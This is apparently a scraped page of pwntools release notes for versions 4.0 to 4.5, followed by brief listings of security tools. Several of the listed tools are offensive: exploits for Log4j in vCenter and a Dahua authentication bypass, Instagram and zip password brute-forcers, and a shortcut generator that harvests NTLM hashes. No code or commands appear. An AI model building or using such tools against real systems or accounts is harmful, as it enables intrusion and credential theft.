    • #1757 update cache directories
    • #1758 Remove eval from cli
    • #1780 Re-add Python2 to the official Dockerfile
    • #1941 Disable all Android tests, pwnlib.adb is no longer supported in CI
    • #1811 Remove unnecessary pwn.toplevel.__all__
    • #1827 Support $XDG_CONFIG_HOME dir for pwn.conf
    • #1841 Add colored_traceback
    • #1839 run_in_new_terminal now creates a runner script if given a list or tuple
    • #1833 Add pwnlib.filesystem module
    • #1852 Fix atexit on Python 3
    Source code(tar.gz)
    Source code(zip)
  • 4.5.0beta1(Apr 19, 2021)

  • 4.5.0beta0(Mar 29, 2021)

    • #1261 Misc run_in_new_terminal improvements (notably gdb terminated by default)
    • #1695 Allow using GDB Python API
    • #1735 Python 3.9 support in safeeval
    • #1738 Which function support custom search path
      • process also looks now at env['PATH'] to find the path for the executable
    • #1742 New baremetal os to debug binaries executed with qemu-system-$(arch)
    • #1757 update cache directories
    • #1758 Remove eval from cli
    • #1780 Re-add Python2 to the official Dockerfile
    • #1941 Disable all Android tests, pwnlib.adb is no longer supported in CI
    • #1811 Remove unnecessary pwn.toplevel.__all__
    • #1827 Support $XDG_CONFIG_HOME dir for pwn.conf
    • #1841 Add colored_traceback
    • #1839 run_in_new_terminal now creates a runner script if given a list or tuple
    • #1833 Add pwnlib.filesystem module
    Source code(tar.gz)
    Source code(zip)
  • 4.4.0(Mar 29, 2021)

    • #1541 Use context.newline for tubes by default
    • #1602 Fix bytes handling in ssh tubes
    • #1606 Fix asm() and disasm() for MSP430, S390
    • #1616 Fix cyclic cli for 64 bit integers
    • #1632 Enable usage of Pwntools in jupyter
    • #1633 Open a shell if pwn template cannot download the remote file
    • #1644 Enable and support SNI for SSL-wrapped tubes
    • #1651 Make pwn shellcraft faster
    • #1654 Docker images (pwntools/pwntools:stable etc) now use Python3 by default, and includes assemblers for a few common architectures
    • #1667 Add i386 encoder ascii_shellcode (Fixed docs in #1693)
    • Fix syscall instruction lists for SROP on i386 and amd64
    • Fix migration to another ROP
    • #1673 Add base= argument to ROP.chain() and ROP.dump()
    • #1675 Gdbserver now correctly accepts multiple libraries in LD_PRELOAD and LD_LIBRARY_PATH
    • #1678 ROPGadget multibr
    • #1682 ROPGadget multibr fix
    • #1687 Actually import requests when doing from pwn import *
    • #1688 Add __setattr__ and __call__ interfaces to ROP for setting registers
    • #1692 Remove python2 shebangs where appropriate
    • #1703 Update libcdb buildid offsets for amd64 and i386
    • #1704 Try https://libc.rip/ for libcdb lookup
    Source code(tar.gz)
    Source code(zip)
  • 4.4.0beta1(Nov 29, 2020)

  • 4.3.1(Nov 29, 2020)

  • 4.4.0beta0(Oct 20, 2020)

    • #1541 Use context.newline for tubes by default
    • #1602 Fix bytes handling in ssh tubes
    • #1606 Fix asm() and disasm() for MSP430, S390
    • #1616 Fix cyclic cli for 64 bit integers
    • #1632 Enable usage of Pwntools in jupyter
    • #1633 Open a shell if pwn template cannot download the remote file
    • #1644 Enable and support SNI for SSL-wrapped tubes
    • #1651 Make pwn shellcraft faster
    • #1654 Docker images (pwntools/pwntools:stable etc) now use Python3 by default, and includes assemblers for a few common architectures
    • #1667 Add i386 encoder ascii_shellcode (Fixed docs in #1693)
    • Fix syscall instruction lists for SROP on i386 and amd64
    • Fix migration to another ROP
    • #1673 Add base= argument to ROP.chain() and ROP.dump()
    • #1675 Gdbserver now correctly accepts multiple libraries in LD_PRELOAD and LD_LIBRARY_PATH
    • #1678 ROPGadget multibr
    • #1682 ROPGadget multibr fix
    • #1687 Actually import requests when doing from pwn import *
    • #1688 Add __setattr__ and __call__ interfaces to ROP for setting registers
    • #1692 Remove python2 shebangs where appropriate
    • #1703 Update libcdb buildid offsets for amd64 and i386
    Source code(tar.gz)
    Source code(zip)
  • 4.3.0(Nov 24, 2020)

    • Speed up ELF PLT loading (#1515)
    • Take numbwritten bytes into account in FmtString (#1471)
    • Support opening of new windows in WSL (#1503)
    • #1576 Add executable= argument to ELF.search
    • #1584 Add jmp_esp/jmp_rsp attribute to ROP
    • #1592 Fix over-verbose logging of process() environment
    • #1593 Colorize output of pwn template
    • #1601 Add pwn version command line tool
    • #1605 Add to fiddling.hexdump a way to suppress the total at the end
    • #1613 Permit --password for pwn template
    • #1564 Fix asm() and disasm() for PowerPC64, MIPS64, Sparc64
    • #1621 Permit negative values in flat() and fit()
    • many more
    Source code(tar.gz)
    Source code(zip)
  • 4.2.2(Oct 20, 2020)

  • 4.2.1(Jul 11, 2020)

  • 4.3.0beta0(Jul 9, 2020)

    • Speed up ELF PLT loading (#1515)
    • Take numbwritten bytes into account in FmtString (#1471)
    • Support opening of new windows in WSL (#1503)
    • #1576 Add executable= argument to ELF.search
    • #1584 Add jmp_esp/jmp_rsp attribute to ROP
    • #1592 Fix over-verbose logging of process() environment
    • #1593 Colorize output of pwn template
    • #1601 Add pwn version command line tool
    • #1605 Add to fiddling.hexdump a way to suppress the total at the end
    • #1613 Permit --password for pwn template
    • #1564 Fix asm() and disasm() for PowerPC64, MIPS64, Sparc64
    • #1621 Permit negative values in flat() and fit()
    Source code(tar.gz)
    Source code(zip)
  • 4.1.1(Jun 3, 2020)

    • Fix PLT resolution by locking unicorn <1.0.2rc4 (#1538)
    • Fix wrong ELF/context unpack handling (c4c11a37)
    • Fix updating of ELF.functions addresses after changing ELF.address #1512 (#1513)
    • Update Corefile warnings and replace asserts with normal checks (#1526)
    • several py2-py3 issues (#1451)
    • Fix cyclic command
    Source code(tar.gz)
    Source code(zip)
  • 4.2.0beta0(May 8, 2020)

    • #1436 Add ret2dlresolve automation
    • fecf9f tubes.ssh.process() no longer requires python 2 installed on remote (still requires python, though)
    • Miscellanous improvements to DynElf and fmtstr leaker (see examples/fmtstr/exploit2.py)
    • #1454 Support for windows console colors
    Source code(tar.gz)
    Source code(zip)
  • 4.1.0(May 8, 2020)

    • #1316 Fix connect shellcraft in python 3
    • #1323 Fix issues related with debugging
    • #1001 Enhance unlock_bootloader with better status messages
    • #1389 remove old dependencies
    • #1241 Launch QEMU with sysroot if specified
    • #1218 Support for FileStructure exploitation
    • Many bug fixes
    Source code(tar.gz)
    Source code(zip)
  • 4.0.1(Jan 22, 2020)

    • #1412 recvline_pred() and similar do not reorder data
    • Bypass unicorn-engine/unicorn#1100 and unicorn-engine/unicorn#1170 requiring unstable package
    Source code(tar.gz)
    Source code(zip)
  • 4.1.0beta0(Jan 9, 2020)

    • #1316 Fix connect shellcraft in python 3
    • #1323 Fix issues related with debugging
    • #1001 Enhance unlock_bootloader with better status messages
    • #1389 remove old dependencies
    • #1241 Launch QEMU with sysroot if specified
    • #1218 Support for FileStructure exploitation
    Source code(tar.gz)
    Source code(zip)
  • 4.0.0(Jan 9, 2020)

    • Python 3 support! <3
    • #1402 Fix serialtube in python 3
    • #1391 Fix process.libs
    • #1317 Tubes with context.encoding
    • #1216 Improve format string generator
    • #1285 Add freebsd generic syscall templates
    • 76413f Add pwnlib.adb.bootimg for 'ANDROID!' format boot.img images
    • #1202 Docker: Kill 14 layers in pwntools base images
    • #1182 shellcraft.dupio() for mips
    Source code(tar.gz)
    Source code(zip)
  • 4.0.0beta0(Nov 10, 2019)

    • Python 3 support! <3
    • #1317 Tubes with context.encoding
    • #1216 Improve format string generator
    • #1285 Add freebsd generic syscall templates
    • 76413f Add pwnlib.adb.bootimg for 'ANDROID!' format boot.img images
    • #1202 Docker: Kill 14 layers in pwntools base images
    • #1182 shellcraft.dupio() for mips
    Source code(tar.gz)
    Source code(zip)
A Burp Pro extension that adds log4shell checks to Burp Scanner

scan4log4shell A Burp Pro extension that adds log4shell checks to Burp Scanner, written by Daniel Crowley of IBM X-Force Red. Installation To install

X-Force Red 26 Mar 15, 2022
集成crawlergo、xray、dirsearch、nmap等工具的src漏洞挖掘工具,使用docker封装运行;

tools下有几个工具,所以项目文件比较大,如果下载总是中断的话建议拆开下载各个项目然后直接拷贝dockefile和recon.py即可 0x01 hscan介绍 hscan是什么 hscan是一款旨在使用一条命令替代渗透前的多条扫描命令,通过集成crawlergo扫描和xray扫描、dirsear

102 Jan 04, 2023
A python script to turn Ubuntu Desktop in a one stop security platform. The InfoSec Fortress installs the packages,tools, and resources to make Ubuntu 20.04 capable of both offensive and defensive security work.

infosec-fortress A python script to turn Ubuntu Desktop into a strong DFIR/RE System with some teeth (Purple Team Ops)! This is intended to create a s

James 41 Dec 30, 2022
Tenssens framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources.

Tenssens framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources.

Md. Nur habib 31 Oct 21, 2022
The Modern Hash Identification System

🔗 Don't know what type of hash it is? Name That Hash will name that hash type! 🤖 Identify MD5, SHA256 and 3000+ other hashes ☄ Comes with a neat web app 🔥

1.2k Dec 28, 2022
Security audit Python project dependencies against security advisory databases.

Security audit Python project dependencies against security advisory databases.

52 Dec 17, 2022
Exploiting CVE-2021-44228 in vCenter for remote code execution and more

Log4jCenter Exploiting CVE-2021-44228 in vCenter for remote code execution and more. Blog post detailing exploitation linked below: COMING SOON Why? P

81 Dec 20, 2022
聚合Github上已有的Poc或者Exp,CVE信息来自CVE官网。Auto Collect Poc Or CVE from Github by CVE ID.

PocOrExp in Github 聚合Github上已有的Poc或者Exp,CVE信息来自CVE官网 注意:只通过通用的CVE号聚合,因此对于MS17-010等Windows编号漏洞以及著名的有绰号的漏洞,还是自己检索一下比较好 Usage python3 exp.py -h usage: ex

567 Dec 30, 2022
Dahua IPC/VTH/VTO devices auth bypass exploit

CVE-2021-33044 Dahua IPC/VTH/VTO devices auth bypass exploit About: The identity authentication bypass vulnerability found in some Dahua products duri

Ashish Kunwar 23 Dec 02, 2022
zip-brute Zip File Password Cracking with Using Password List

Zip brute is a python script that cracks zip that are password protected using a wordlist dictionary.

AnonyminHack5 13 Nov 03, 2022
NS-LOOKUP - A python script for scanning website for getting ip address of a website

NS-LOOKUP A python script for scanning website for getting ip address of a websi

Spider Anongreyhat 5 Aug 02, 2022
CVE-2021-22205 Unauthorized RCE

CVE-2021-22205 影响版本: Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE 13.8.8 Usage python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog

r0eXpeR 70 Nov 09, 2022
log4j-tools: CVE-2021-44228 poses a serious threat to a wide range of Java-based applications

log4j-tools Quick links Click to find: Inclusions of log4j2 in compiled code Calls to log4j2 in compiled code Calls to log4j2 in source code Overview

JFrog Ltd. 171 Dec 25, 2022
It's a simple tool for test vulnerability shellshock

Shellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to ex

Mr. Cl0wn - H4ck1ng C0d3r 88 Dec 23, 2022
It's a simple tool for test vulnerability Apache Path Traversal

SimplesApachePathTraversal Simples Apache Path Traversal It's a simple tool for test vulnerability Apache Path Traversal https://blog.mrcl0wn.com/2021

Mr. Cl0wn - H4ck1ng C0d3r 56 Dec 27, 2022
Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely.

CVE-2021-31166: HTTP Protocol Stack Remote Code Execution Vulnerability This is a proof of concept for CVE-2021-31166 ("HTTP Protocol Stack Remote Cod

Axel Souchet 820 Dec 18, 2022
A python script to brute-force guess the passwords to Instagram accounts

Instagram-Brute-Force The purpose of this script is to brute-force guess the passwords to Instagram accounts. Specifics: Comes with 2 separate modes i

Moondog 2 Nov 16, 2021
A Modified version of TCC's Osprey poc framework......

fierce-fish fierce-fish是由TCC(斗象能力中心)出品并维护的开源漏洞检测框架osprey的改写,去掉臃肿功能的精简版本poc框架 PS:真的用不惯其它臃肿的功能,不过作为一个收集漏洞poc && exp的框架还是非常不错的!!! osprey For beginners fr

lUc1f3r11 10 Dec 30, 2022
Lnkbomb - Malicious shortcut generator for collecting NTLM hashes from insecure file shares

Lnkbomb Lnkbomb is used for uploading malicious shortcut files to insecure file

Joe Helle 216 Jan 08, 2023